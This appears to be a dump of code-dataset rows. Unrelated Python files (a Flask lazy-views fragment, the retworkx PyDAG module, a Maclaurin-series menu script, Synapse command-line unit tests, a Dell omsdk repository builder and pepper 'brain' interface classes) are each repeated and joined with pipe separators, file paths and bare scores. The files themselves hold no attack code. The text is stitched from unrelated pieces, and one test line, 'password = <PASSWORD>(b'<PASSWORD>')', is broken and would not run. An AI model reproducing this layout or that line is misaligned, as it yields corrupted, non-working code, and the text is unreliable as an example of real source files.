app_handler = getattr(self.instance, 'app_errorhandler', None)
handler = self.instance.errorhandler
method = app_handler if app and app_handler else handler
method(code_or_exception)(self.get_view(mixed))
def add_static(self, url_rule, filename=None, **options):
"""
Add URL rule for serving static files to Flask app or blueprint.
"""
assert self.instance, 'LazyViews instance is not properly initialized.'
if filename:
options.setdefault('defaults', {}).update({'filename': filename})
self.add(url_rule, self.instance.send_static_file, **options)
def add_template(self, url_rule, template_name, **options):
"""
Render template name with context for given URL rule.
Context should be a plain dict or callable. If callable its result
would be passed to :func:`flask.render_template` function.
"""
assert self.instance, 'LazyViews instance is not properly initialized.'
def renderer(template_name, mixed):
context = mixed() if callable(mixed) else mixed or {}
return partial(render_template, template_name, **context)
view = renderer(template_name, options.pop('context', None))
self.add(url_rule, view, **options)
def build_import_name(self, import_name):
"""
Prepend import prefix to import name if it earlier defined by user.
"""
return '.'.join(filter(None, (self.import_prefix, import_name)))
def get_view(self, mixed):
"""
If ``mixed`` value is callable it's our view, else wrap it with
:class:`flask_lazyviews.utils.LazyView` instance.
"""
if callable(mixed) or not isinstance(mixed, string_types):
return mixed
return LazyView(self.build_import_name(mixed))
def init_app(self, app, import_prefix=None):
"""
Configure :class:`LazyViews` instance, store ``app`` or ``blueprint``
instance and import prefix if any.
"""
if import_prefix and import_prefix.startswith('.'):
import_name = (app.import_name
if app.import_name != '__main__'
else '')
assert import_name, ('You should properly configure import name '
'for {0!r} instance or edit import prefix to '
'not start with ".".'.format(app))
import_prefix = import_name + import_prefix
self.import_prefix = import_prefix or self.import_prefix
self.instance = app
def init_blueprint(self, blueprint, import_prefix=None):
"""
Alias for init app function, cause basically there are no important
differences between Flask app and blueprint if we only need to add URL
rule.
"""
return self.init_app(blueprint, import_prefix) | 0.5 | 0.193223 |
import sys
from .retworkx import *
sys.modules['retworkx.generators'] = generators
class PyDAG(PyDiGraph):
"""A class for creating direct acyclic graphs.
PyDAG is just an alias of the PyDiGraph class and behaves identically to
the :class:`~retworkx.PyDiGraph` class and can be used interchangably
with ``PyDiGraph``. It currently exists solely as a backwards
compatibility alias for users of retworkx from prior to the
0.4.0 release when there was no PyDiGraph class.
The PyDAG class is used to create a directed graph. It can be a
multigraph (have multiple edges between nodes). Each node and edge
(although rarely used for edges) is indexed by an integer id. Additionally,
each node and edge contains an arbitrary Python object as a weight/data
payload.
You can use the index for access to the data payload as in the
following example:
.. jupyter-execute::
import retworkx
graph = retworkx.PyDAG()
data_payload = "An arbitrary Python object"
node_index = graph.add_node(data_payload)
print("Node Index: %s" % node_index)
print(graph[node_index])
The PyDAG class implements the Python mapping protocol for nodes so in
addition to access you can also update the data payload with:
.. jupyter-execute::
import retworkx
graph = retworkx.PyDAG()
data_payload = "An arbitrary Python object"
node_index = graph.add_node(data_payload)
graph[node_index] = "New Payload"
print("Node Index: %s" % node_index)
print(graph[node_index])
The PyDAG class has an option for real time cycle checking which can
be used to ensure any edges added to the graph does not introduce a cycle.
By default the real time cycle checking feature is disabled for
performance, however you can enable it by setting the ``check_cycle``
attribute to True. For example::
import retworkx
dag = retworkx.PyDAG()
dag.check_cycle = True
or at object creation::
import retworkx
dag = retworkx.PyDAG(check_cycle=True)
With check_cycle set to true any calls to :meth:`PyDAG.add_edge` will
ensure that no cycles are added, ensuring that the PyDAG class truly
represents a directed acyclic graph. Do note that this cycle checking on
:meth:`~PyDAG.add_edge`, :meth:`~PyDigraph.add_edges_from`,
:meth:`~PyDAG.add_edges_from_no_data`,
:meth:`~PyDAG.extend_from_edge_list`, and
:meth:`~PyDAG.extend_from_weighted_edge_list` comes with a performance
penalty that grows as the graph does. If you're adding a node and edge at
the same time, leveraging :meth:`PyDAG.add_child` or
:meth:`PyDAG.add_parent` will avoid this overhead.
"""
pass | retworkx/__init__.py |
import sys
from .retworkx import *
sys.modules['retworkx.generators'] = generators
class PyDAG(PyDiGraph):
"""A class for creating direct acyclic graphs.
PyDAG is just an alias of the PyDiGraph class and behaves identically to
the :class:`~retworkx.PyDiGraph` class and can be used interchangably
with ``PyDiGraph``. It currently exists solely as a backwards
compatibility alias for users of retworkx from prior to the
0.4.0 release when there was no PyDiGraph class.
The PyDAG class is used to create a directed graph. It can be a
multigraph (have multiple edges between nodes). Each node and edge
(although rarely used for edges) is indexed by an integer id. Additionally,
each node and edge contains an arbitrary Python object as a weight/data
payload.
You can use the index for access to the data payload as in the
following example:
.. jupyter-execute::
import retworkx
graph = retworkx.PyDAG()
data_payload = "An arbitrary Python object"
node_index = graph.add_node(data_payload)
print("Node Index: %s" % node_index)
print(graph[node_index])
The PyDAG class implements the Python mapping protocol for nodes so in
addition to access you can also update the data payload with:
.. jupyter-execute::
import retworkx
graph = retworkx.PyDAG()
data_payload = "An arbitrary Python object"
node_index = graph.add_node(data_payload)
graph[node_index] = "New Payload"
print("Node Index: %s" % node_index)
print(graph[node_index])
The PyDAG class has an option for real time cycle checking which can
be used to ensure any edges added to the graph does not introduce a cycle.
By default the real time cycle checking feature is disabled for
performance, however you can enable it by setting the ``check_cycle``
attribute to True. For example::
import retworkx
dag = retworkx.PyDAG()
dag.check_cycle = True
or at object creation::
import retworkx
dag = retworkx.PyDAG(check_cycle=True)
With check_cycle set to true any calls to :meth:`PyDAG.add_edge` will
ensure that no cycles are added, ensuring that the PyDAG class truly
represents a directed acyclic graph. Do note that this cycle checking on
:meth:`~PyDAG.add_edge`, :meth:`~PyDigraph.add_edges_from`,
:meth:`~PyDAG.add_edges_from_no_data`,
:meth:`~PyDAG.extend_from_edge_list`, and
:meth:`~PyDAG.extend_from_weighted_edge_list` comes with a performance
penalty that grows as the graph does. If you're adding a node and edge at
the same time, leveraging :meth:`PyDAG.add_child` or
:meth:`PyDAG.add_parent` will avoid this overhead.
"""
pass | 0.589716 | 0.66113 |
from dataclasses import dataclass
from math import factorial as f
# pip install prototools
from prototools import Menu, textbox, int_input
N = 10
def sinx(x, n=N):
return sum((-1)**k * x**(2*k + 1) / f(2*k + 1) for k in range(n + 1))
def cosx(x, n=N):
return sum((-1)**k * x**(2*k) / f(2*k) for k in range(n + 1))
def expx(x, n=N):
return sum((x**k) / f(k) for k in range(n + 1))
def arcsenx(x, n=N):
return sum(
(f(2*k) * x**(2*k + 1)) / (4**k * (f(k)**2) * (2*k + 1))
for k in range(n + 1)
)
def _f(f, a, b, n):
if f == arcsenx:
if a < -1 or b > 1:
textbox("Fuera de dominio")
return
h = (abs(a) + abs(b)) / n
t, k = [], a
while k <= b:
t.append(round(k, 2))
k += h
for i in t:
print(f"x: {i:>4} f({i:>4.1f}) -> {f(i):>6.2f}")
@dataclass
class Solution:
a: int = -1
b: int = 1
n: int = 10
def set_a(self, a):
self.a = a
def set_b(self, b):
self.b = b
def set_n(self, n):
self.n = n
def evaluar(self, f):
_f(f, self.a, self.b, self.n)
def main():
sol = Solution()
menu = Menu("Aproximacion de Funciones")
menu.add_options(
("Ingresar el valor de a",
lambda: sol.set_a(int_input("Ingrese el valor de a: "))),
("Ingresar el valor de b",
lambda: sol.set_b(int_input("Ingrese el valor de b: "))),
("Ingresar el valor de n",
lambda: sol.set_n(int_input("Ingrese el valor de n: "))),
("Evaluación de la función exp(x) en la partición",
lambda: sol.evaluar(expx)),
("Evaluación de la función sen(x) en la partición",
lambda: sol.evaluar(sinx)),
("Evaluación de la función cos(x) en la partición",
lambda: sol.evaluar(cosx)),
("Evaluación de la función arcsen(x) en la partición",
lambda: sol.evaluar(arcsenx)),
)
menu.settings(header_bottom=True)
menu.run()
if __name__ == "__main__":
main() | soluciones/aproximacion_series_maclaurin/main.py | from dataclasses import dataclass
from math import factorial as f
# pip install prototools
from prototools import Menu, textbox, int_input
N = 10
def sinx(x, n=N):
return sum((-1)**k * x**(2*k + 1) / f(2*k + 1) for k in range(n + 1))
def cosx(x, n=N):
return sum((-1)**k * x**(2*k) / f(2*k) for k in range(n + 1))
def expx(x, n=N):
return sum((x**k) / f(k) for k in range(n + 1))
def arcsenx(x, n=N):
return sum(
(f(2*k) * x**(2*k + 1)) / (4**k * (f(k)**2) * (2*k + 1))
for k in range(n + 1)
)
def _f(f, a, b, n):
if f == arcsenx:
if a < -1 or b > 1:
textbox("Fuera de dominio")
return
h = (abs(a) + abs(b)) / n
t, k = [], a
while k <= b:
t.append(round(k, 2))
k += h
for i in t:
print(f"x: {i:>4} f({i:>4.1f}) -> {f(i):>6.2f}")
@dataclass
class Solution:
a: int = -1
b: int = 1
n: int = 10
def set_a(self, a):
self.a = a
def set_b(self, b):
self.b = b
def set_n(self, n):
self.n = n
def evaluar(self, f):
_f(f, self.a, self.b, self.n)
def main():
sol = Solution()
menu = Menu("Aproximacion de Funciones")
menu.add_options(
("Ingresar el valor de a",
lambda: sol.set_a(int_input("Ingrese el valor de a: "))),
("Ingresar el valor de b",
lambda: sol.set_b(int_input("Ingrese el valor de b: "))),
("Ingresar el valor de n",
lambda: sol.set_n(int_input("Ingrese el valor de n: "))),
("Evaluación de la función exp(x) en la partición",
lambda: sol.evaluar(expx)),
("Evaluación de la función sen(x) en la partición",
lambda: sol.evaluar(sinx)),
("Evaluación de la función cos(x) en la partición",
lambda: sol.evaluar(cosx)),
("Evaluación de la función arcsen(x) en la partición",
lambda: sol.evaluar(arcsenx)),
)
menu.settings(header_bottom=True)
menu.run()
if __name__ == "__main__":
main() | 0.659186 | 0.414366 |
import base64
import pytest
from unittest.mock import call, Mock, patch
import synapseclient.__main__ as cmdline
from synapseclient.core.exceptions import SynapseAuthenticationError, SynapseNoCredentialsError
import synapseutils
def test_command_sync(syn):
"""Test the sync function.
Since this function only passes argparse arguments for the sync subcommand
straight to `synapseutils.sync.syncToSynapse`, the only tests here are for
the command line arguments provided and that the function is called once.
"""
parser = cmdline.build_parser()
args = parser.parse_args(['sync', '/tmp/foobarbaz.tsv'])
assert args.manifestFile == '/tmp/foobarbaz.tsv'
assert args.dryRun is False
assert args.sendMessages is False
assert args.retries == 4
with patch.object(synapseutils, "syncToSynapse") as mockedSyncToSynapse:
cmdline.sync(args, syn)
mockedSyncToSynapse.assert_called_once_with(syn,
manifestFile=args.manifestFile,
dryRun=args.dryRun,
sendMessages=args.sendMessages,
retries=args.retries)
def test_get_multi_threaded_flag():
"""Test the multi threaded command line flag"""
parser = cmdline.build_parser()
args = parser.parse_args(['get', '--multiThreaded', 'syn123'])
assert args.multiThreaded
# defaults to True
args = parser.parse_args(['get', 'syn123'])
assert args.multiThreaded
@patch('builtins.print')
def test_get_sts_token(mock_print):
"""Test getting an STS token."""
folder_id = 'syn_1'
permission = 'read_write'
syn = Mock()
expected_output = 'export foo=bar'
syn.get_sts_storage_token.return_value = expected_output
parser = cmdline.build_parser()
args = parser.parse_args(['get-sts-token', folder_id, permission, '-o', 'shell'])
cmdline.get_sts_token(args, syn)
syn.get_sts_storage_token.assert_called_with(folder_id, permission, output_format='shell')
mock_print.assert_called_once_with(expected_output)
def test_authenticate_login__success(syn):
"""Verify happy path for _authenticate_login"""
with patch.object(syn, 'login'):
cmdline._authenticate_login(syn, 'foo', 'bar', rememberMe=True, silent=True)
syn.login.assert_called_once_with('foo', 'bar', rememberMe=True, silent=True)
def test_authenticate_login__api_key(syn):
"""Verify attempting to authenticate when supplying an api key as the password.
Should attempt to treat the password as an api key after the initial failure as a password."""
username = 'foo'
password = <PASSWORD>(b'<PASSWORD>')
login_kwargs = {'rememberMe': True}
expected_login_calls = [
call(username, password, **login_kwargs),
call(username, apiKey=password, **login_kwargs)
]
with patch.object(syn, 'login') as login:
login.side_effect = SynapseAuthenticationError()
# simulate failure both as password and as api key
with pytest.raises(SynapseAuthenticationError):
cmdline._authenticate_login(syn, username, password, **login_kwargs)
assert expected_login_calls == login.call_args_list
login.reset_mock()
# now simulate success when used as an api key
def login_side_effect(*args, **kwargs):
if login.call_count == 1:
raise SynapseAuthenticationError()
return
login.side_effect = login_side_effect
cmdline._authenticate_login(syn, username, password, **login_kwargs)
assert expected_login_calls == login.call_args_list
@patch.object(cmdline, '_authenticate_login')
def test_login_with_prompt(mock_authenticate_login, syn):
"""Verify logging in when username/pass supplied as args to the command"""
user = 'foo'
password = '<PASSWORD>'
login_kwargs = {
'rememberMe': False,
'silent': True,
'forced': True,
}
cmdline.login_with_prompt(syn, user, password, **login_kwargs)
mock_authenticate_login.assert_called_once_with(syn, user, password, **login_kwargs)
@patch.object(cmdline, 'getpass')
@patch.object(cmdline, 'input')
@patch.object(cmdline, '_authenticate_login')
def test_login_with_prompt__getpass(mock_authenticate_login, mock_input, mock_getpass, syn):
"""Verify logging in when entering username/pass from the console."""
user = 'foo'
password = '<PASSWORD>'
login_kwargs = {
'rememberMe': False,
'silent': True,
'forced': True,
}
def authenticate_side_effect(*args, **kwargs):
if mock_authenticate_login.call_count == 1:
raise SynapseNoCredentialsError()
return
mock_authenticate_login.side_effect = authenticate_side_effect
mock_input.return_value = user
mock_getpass.getpass.return_value = password
cmdline.login_with_prompt(syn, None, None, **login_kwargs)
mock_input.assert_called_once_with("Synapse username: ")
mock_getpass.getpass.assert_called_once_with(("Password or api key for " + user + ": ").encode('utf-8'))
expected_authenticate_calls = [
call(syn, None, None, **login_kwargs),
call(syn, user, password, **{k: v for k, v in login_kwargs.items() if k != 'silent'})
]
assert expected_authenticate_calls == mock_authenticate_login.call_args_list | tests/unit/synapseclient/unit_test_commandline.py | import base64
import pytest
from unittest.mock import call, Mock, patch
import synapseclient.__main__ as cmdline
from synapseclient.core.exceptions import SynapseAuthenticationError, SynapseNoCredentialsError
import synapseutils
def test_command_sync(syn):
"""Test the sync function.
Since this function only passes argparse arguments for the sync subcommand
straight to `synapseutils.sync.syncToSynapse`, the only tests here are for
the command line arguments provided and that the function is called once.
"""
parser = cmdline.build_parser()
args = parser.parse_args(['sync', '/tmp/foobarbaz.tsv'])
assert args.manifestFile == '/tmp/foobarbaz.tsv'
assert args.dryRun is False
assert args.sendMessages is False
assert args.retries == 4
with patch.object(synapseutils, "syncToSynapse") as mockedSyncToSynapse:
cmdline.sync(args, syn)
mockedSyncToSynapse.assert_called_once_with(syn,
manifestFile=args.manifestFile,
dryRun=args.dryRun,
sendMessages=args.sendMessages,
retries=args.retries)
def test_get_multi_threaded_flag():
"""Test the multi threaded command line flag"""
parser = cmdline.build_parser()
args = parser.parse_args(['get', '--multiThreaded', 'syn123'])
assert args.multiThreaded
# defaults to True
args = parser.parse_args(['get', 'syn123'])
assert args.multiThreaded
@patch('builtins.print')
def test_get_sts_token(mock_print):
"""Test getting an STS token."""
folder_id = 'syn_1'
permission = 'read_write'
syn = Mock()
expected_output = 'export foo=bar'
syn.get_sts_storage_token.return_value = expected_output
parser = cmdline.build_parser()
args = parser.parse_args(['get-sts-token', folder_id, permission, '-o', 'shell'])
cmdline.get_sts_token(args, syn)
syn.get_sts_storage_token.assert_called_with(folder_id, permission, output_format='shell')
mock_print.assert_called_once_with(expected_output)
def test_authenticate_login__success(syn):
"""Verify happy path for _authenticate_login"""
with patch.object(syn, 'login'):
cmdline._authenticate_login(syn, 'foo', 'bar', rememberMe=True, silent=True)
syn.login.assert_called_once_with('foo', 'bar', rememberMe=True, silent=True)
def test_authenticate_login__api_key(syn):
"""Verify attempting to authenticate when supplying an api key as the password.
Should attempt to treat the password as an api key after the initial failure as a password."""
username = 'foo'
password = <PASSWORD>(b'<PASSWORD>')
login_kwargs = {'rememberMe': True}
expected_login_calls = [
call(username, password, **login_kwargs),
call(username, apiKey=password, **login_kwargs)
]
with patch.object(syn, 'login') as login:
login.side_effect = SynapseAuthenticationError()
# simulate failure both as password and as api key
with pytest.raises(SynapseAuthenticationError):
cmdline._authenticate_login(syn, username, password, **login_kwargs)
assert expected_login_calls == login.call_args_list
login.reset_mock()
# now simulate success when used as an api key
def login_side_effect(*args, **kwargs):
if login.call_count == 1:
raise SynapseAuthenticationError()
return
login.side_effect = login_side_effect
cmdline._authenticate_login(syn, username, password, **login_kwargs)
assert expected_login_calls == login.call_args_list
@patch.object(cmdline, '_authenticate_login')
def test_login_with_prompt(mock_authenticate_login, syn):
"""Verify logging in when username/pass supplied as args to the command"""
user = 'foo'
password = '<PASSWORD>'
login_kwargs = {
'rememberMe': False,
'silent': True,
'forced': True,
}
cmdline.login_with_prompt(syn, user, password, **login_kwargs)
mock_authenticate_login.assert_called_once_with(syn, user, password, **login_kwargs)
@patch.object(cmdline, 'getpass')
@patch.object(cmdline, 'input')
@patch.object(cmdline, '_authenticate_login')
def test_login_with_prompt__getpass(mock_authenticate_login, mock_input, mock_getpass, syn):
"""Verify logging in when entering username/pass from the console."""
user = 'foo'
password = '<PASSWORD>'
login_kwargs = {
'rememberMe': False,
'silent': True,
'forced': True,
}
def authenticate_side_effect(*args, **kwargs):
if mock_authenticate_login.call_count == 1:
raise SynapseNoCredentialsError()
return
mock_authenticate_login.side_effect = authenticate_side_effect
mock_input.return_value = user
mock_getpass.getpass.return_value = password
cmdline.login_with_prompt(syn, None, None, **login_kwargs)
mock_input.assert_called_once_with("Synapse username: ")
mock_getpass.getpass.assert_called_once_with(("Password or api key for " + user + ": ").encode('utf-8'))
expected_authenticate_calls = [
call(syn, None, None, **login_kwargs),
call(syn, user, password, **{k: v for k, v in login_kwargs.items() if k != 'silent'})
]
assert expected_authenticate_calls == mock_authenticate_login.call_args_list | 0.562056 | 0.268258 |
from argparse import ArgumentParser
from omsdk.sdkfile import LocalFile
from omsdk.sdkcenum import TypeHelper
from omsdk.catalog.sdkupdatemgr import UpdateManager
from omsdk.catalog.sdkhttpsrc import DownloadProtocolEnum
from omdrivers.helpers.iDRAC.UpdateHelper import UpdateHelper
from omsdk.omlogs.Logger import LogManager, LoggerConfigTypeEnum
import sys
import logging
# LogManager.setup_logging()
logger = logging.getLogger(__name__)
def RepoBuilder(arglist):
parser = ArgumentParser(description='Local Repository Builder')
parser.add_argument('-C', '--catalog',
action="store", dest="catalog", nargs='?',
default='Catalog', type=str,
help="Name of the Catalog file that contains the info about needed DUPs")
parser.add_argument('-f', '--folder',
action="store", dest="folder", type=str,
help="folder from where repository is built")
parser.add_argument('-c', '--components',
action="store", dest="component", nargs='+',
help="components for which the DUPs are requested.")
parser.add_argument('-s', '--site',
action="store", dest="site", type=str, nargs='?',
default='downloads.dell.com',
help="models for which the DUPs are requested.")
parser.add_argument('-p', '--protocol',
action="store", dest="protocol", nargs='?',
default='HTTP', choices=['HTTP', 'FTP', 'NoOp', 'HashCheck'],
help="models for which the DUPs are requested.")
parser.add_argument('-v', '--verbose',
action="store_true", help="verbose mode")
parser.add_argument('-D', '--download-dups',
action="store_true", dest="dld_dups", help="download DUPs")
parser.add_argument('-l', '--download-catalog',
action="store_true", dest="dld_catalog", help="download catalog")
parser.add_argument('-b', '--build-catalog',
action="store_true", dest="build_catalog", help="build catalog")
options = parser.parse_args(arglist)
if not options.component:
options.component = []
if options.folder is None:
print("Folder must be provided")
return -1
if options.verbose is None:
options.verbose = False
if options.verbose:
logging.basicConfig(level=logging.DEBUG)
if not options.dld_dups and not options.build_catalog and \
not options.dld_catalog:
options.dld_catalog = True
options.build_catalog = True
options.dld_dups = True
options.protocol = TypeHelper.convert_to_enum(options.protocol,
DownloadProtocolEnum)
updshare = LocalFile(local=options.folder, isFolder=True)
if not updshare.IsValid:
print("Folder is not writable!")
return -2
if options.protocol != DownloadProtocolEnum.HashCheck:
print("Configuring Update Share...")
UpdateManager.configure(updshare, site=options.site,
protocol=options.protocol)
if options.dld_catalog:
if options.protocol != DownloadProtocolEnum.HashCheck:
print("Updating Catalog from downloads.dell.com...")
UpdateManager.update_catalog()
if options.build_catalog:
if options.protocol != DownloadProtocolEnum.HashCheck:
print("Building Repository Catalog ....")
UpdateHelper.build_repo(options.catalog, True, *options.component)
if options.dld_dups:
if options.protocol != DownloadProtocolEnum.HashCheck:
print("Downloading DUPs ...")
UpdateManager.update_cache(options.catalog)
if __name__ == "__main__":
RepoBuilder(sys.argv[1:]) | omdrivers/helpers/iDRAC/RepoBuilder.py | from argparse import ArgumentParser
from omsdk.sdkfile import LocalFile
from omsdk.sdkcenum import TypeHelper
from omsdk.catalog.sdkupdatemgr import UpdateManager
from omsdk.catalog.sdkhttpsrc import DownloadProtocolEnum
from omdrivers.helpers.iDRAC.UpdateHelper import UpdateHelper
from omsdk.omlogs.Logger import LogManager, LoggerConfigTypeEnum
import sys
import logging
# LogManager.setup_logging()
logger = logging.getLogger(__name__)
def RepoBuilder(arglist):
parser = ArgumentParser(description='Local Repository Builder')
parser.add_argument('-C', '--catalog',
action="store", dest="catalog", nargs='?',
default='Catalog', type=str,
help="Name of the Catalog file that contains the info about needed DUPs")
parser.add_argument('-f', '--folder',
action="store", dest="folder", type=str,
help="folder from where repository is built")
parser.add_argument('-c', '--components',
action="store", dest="component", nargs='+',
help="components for which the DUPs are requested.")
parser.add_argument('-s', '--site',
action="store", dest="site", type=str, nargs='?',
default='downloads.dell.com',
help="models for which the DUPs are requested.")
parser.add_argument('-p', '--protocol',
action="store", dest="protocol", nargs='?',
default='HTTP', choices=['HTTP', 'FTP', 'NoOp', 'HashCheck'],
help="models for which the DUPs are requested.")
parser.add_argument('-v', '--verbose',
action="store_true", help="verbose mode")
parser.add_argument('-D', '--download-dups',
action="store_true", dest="dld_dups", help="download DUPs")
parser.add_argument('-l', '--download-catalog',
action="store_true", dest="dld_catalog", help="download catalog")
parser.add_argument('-b', '--build-catalog',
action="store_true", dest="build_catalog", help="build catalog")
options = parser.parse_args(arglist)
if not options.component:
options.component = []
if options.folder is None:
print("Folder must be provided")
return -1
if options.verbose is None:
options.verbose = False
if options.verbose:
logging.basicConfig(level=logging.DEBUG)
if not options.dld_dups and not options.build_catalog and \
not options.dld_catalog:
options.dld_catalog = True
options.build_catalog = True
options.dld_dups = True
options.protocol = TypeHelper.convert_to_enum(options.protocol,
DownloadProtocolEnum)
updshare = LocalFile(local=options.folder, isFolder=True)
if not updshare.IsValid:
print("Folder is not writable!")
return -2
if options.protocol != DownloadProtocolEnum.HashCheck:
print("Configuring Update Share...")
UpdateManager.configure(updshare, site=options.site,
protocol=options.protocol)
if options.dld_catalog:
if options.protocol != DownloadProtocolEnum.HashCheck:
print("Updating Catalog from downloads.dell.com...")
UpdateManager.update_catalog()
if options.build_catalog:
if options.protocol != DownloadProtocolEnum.HashCheck:
print("Building Repository Catalog ....")
UpdateHelper.build_repo(options.catalog, True, *options.component)
if options.dld_dups:
if options.protocol != DownloadProtocolEnum.HashCheck:
print("Downloading DUPs ...")
UpdateManager.update_cache(options.catalog)
if __name__ == "__main__":
RepoBuilder(sys.argv[1:]) | 0.37319 | 0.065396 |
from datetime import datetime
from typing import List, Optional
from pepper.brain.utils.helper_functions import casefold
class RDFBase(object):
@property
def label(self):
# type: () -> str
raise NotImplementedError()
@property
def offset(self):
# type: () -> slice
raise NotImplementedError()
@property
def confidence(self):
# type: () -> float
raise NotImplementedError()
class Entity(RDFBase):
@property
def id(self):
# type: () -> str
raise NotImplementedError()
@property
def type(self):
# type: () -> str
raise NotImplementedError()
class Predicate(RDFBase):
@property
def cardinality(self):
# type: () -> int
raise NotImplementedError()
class Triple(object):
@property
def subject(self):
# type: () -> Entity
raise NotImplementedError()
@property
def predicate(self):
# type: () -> Predicate
raise NotImplementedError()
@property
def object(self):
# type: () -> Entity
raise NotImplementedError()
def casefold_capsule(capsule, format='triple'):
"""
Function for formatting a capsule into triple format or natural language format
Parameters
----------
capsule:
format
Returns
-------
"""
for k, v in capsule.items():
if isinstance(v, dict):
capsule[k] = casefold_capsule(v, format=format)
else:
capsule[k] = casefold(v, format=format)
return capsule
class CardinalityConflict(object):
@property
def author(self):
# type: () -> str
raise NotImplementedError()
@property
def date(self):
# type: () -> datetime
raise NotImplementedError()
@property
def object(self):
# type: () -> Entity
raise NotImplementedError()
class NegationConflict(object):
@property
def author(self):
# type: () -> str
raise NotImplementedError()
@property
def date(self):
# type: () -> datetime
raise NotImplementedError()
@property
def predicate(self):
# type: () -> Predicate
raise NotImplementedError()
class StatementNovelty(object):
@property
def author(self):
# type: () -> str
raise NotImplementedError()
@property
def date(self):
# type: () -> datetime
raise NotImplementedError()
class EntityNovelty(object):
@property
def object(self):
# type: () -> bool
raise NotImplementedError()
@property
def subject(self):
# type: () -> bool
raise NotImplementedError()
class Gap(object):
@property
def predicate(self):
# type: () -> Predicate
raise NotImplementedError()
@property
def entity(self):
# type: () -> Entity
raise NotImplementedError()
class Gaps(object):
@property
def object(self):
# type: () -> List[Gap]
raise NotImplementedError()
@property
def subject(self):
# type: () -> List[Gap]
raise NotImplementedError()
class Overlap(object):
@property
def author(self):
# type: () -> str
raise NotImplementedError()
@property
def date(self):
# type: () -> datetime
raise NotImplementedError()
@property
def entity(self):
# type: () -> Entity
raise NotImplementedError()
class Overlaps(object):
@property
def object(self):
# type: () -> List[Overlap]
raise NotImplementedError()
@property
def subject(self):
# type: () -> List[Overlap]
raise NotImplementedError()
class Thoughts(object):
def cardinality_conflicts(self):
# type: () -> List[CardinalityConflict]
raise NotImplementedError()
def negation_conflict(self):
# type: () -> Optional[NegationConflict]
raise NotImplementedError()
def statement_novelties(self):
# type: () -> List[StatementNovelty]
raise NotImplementedError()
def entity_novelty(self):
# type: () -> EntityNovelty
raise NotImplementedError()
def object_gaps(self):
# type: () -> Gaps
raise NotImplementedError()
def subject_gaps(self):
# type: () -> Gaps
raise NotImplementedError()
def overlaps(self):
# type: () -> Overlaps
raise NotImplementedError()
def trust(self):
# type: () -> float
raise NotImplementedError() | pepper/brain/utils/response.py | from datetime import datetime
from typing import List, Optional
from pepper.brain.utils.helper_functions import casefold
class RDFBase(object):
@property
def label(self):
# type: () -> str
raise NotImplementedError()
@property
def offset(self):
# type: () -> slice
raise NotImplementedError()
@property
def confidence(self):
# type: () -> float
raise NotImplementedError()
class Entity(RDFBase):
@property
def id(self):
# type: () -> str
raise NotImplementedError()
@property
def type(self):
# type: () -> str
raise NotImplementedError()
class Predicate(RDFBase):
@property
def cardinality(self):
# type: () -> int
raise NotImplementedError()
class Triple(object):
@property
def subject(self):
# type: () -> Entity
raise NotImplementedError()
@property
def predicate(self):
# type: () -> Predicate
raise NotImplementedError()
@property
def object(self):
# type: () -> Entity
raise NotImplementedError()
def casefold_capsule(capsule, format='triple'):
"""
Function for formatting a capsule into triple format or natural language format
Parameters
----------
capsule:
format
Returns
-------
"""
for k, v in capsule.items():
if isinstance(v, dict):
capsule[k] = casefold_capsule(v, format=format)
else:
capsule[k] = casefold(v, format=format)
return capsule
class CardinalityConflict(object):
@property
def author(self):
# type: () -> str
raise NotImplementedError()
@property
def date(self):
# type: () -> datetime
raise NotImplementedError()
@property
def object(self):
# type: () -> Entity
raise NotImplementedError()
class NegationConflict(object):
@property
def author(self):
# type: () -> str
raise NotImplementedError()
@property
def date(self):
# type: () -> datetime
raise NotImplementedError()
@property
def predicate(self):
# type: () -> Predicate
raise NotImplementedError()
class StatementNovelty(object):
@property
def author(self):
# type: () -> str
raise NotImplementedError()
@property
def date(self):
# type: () -> datetime
raise NotImplementedError()
class EntityNovelty(object):
@property
def object(self):
# type: () -> bool
raise NotImplementedError()
@property
def subject(self):
# type: () -> bool
raise NotImplementedError()
class Gap(object):
@property
def predicate(self):
# type: () -> Predicate
raise NotImplementedError()
@property
def entity(self):
# type: () -> Entity
raise NotImplementedError()
class Gaps(object):
@property
def object(self):
# type: () -> List[Gap]
raise NotImplementedError()
@property
def subject(self):
# type: () -> List[Gap]
raise NotImplementedError()
class Overlap(object):
@property
def author(self):
# type: () -> str
raise NotImplementedError()
@property
def date(self):
# type: () -> datetime
raise NotImplementedError()
@property
def entity(self):
# type: () -> Entity
raise NotImplementedError()
class Overlaps(object):
@property
def object(self):
# type: () -> List[Overlap]
raise NotImplementedError()
@property
def subject(self):
# type: () -> List[Overlap]
raise NotImplementedError()
class Thoughts(object):
def cardinality_conflicts(self):
# type: () -> List[CardinalityConflict]
raise NotImplementedError()
def negation_conflict(self):
# type: () -> Optional[NegationConflict]
raise NotImplementedError()
def statement_novelties(self):
# type: () -> List[StatementNovelty]
raise NotImplementedError()
def entity_novelty(self):
# type: () -> EntityNovelty
raise NotImplementedError()
def object_gaps(self):
# type: () -> Gaps
raise NotImplementedError()
def subject_gaps(self):
# type: () -> Gaps
raise NotImplementedError()
def overlaps(self):
# type: () -> Overlaps
raise NotImplementedError()
def trust(self):
# type: () -> float
raise NotImplementedError() | 0.897354 | 0.273902 |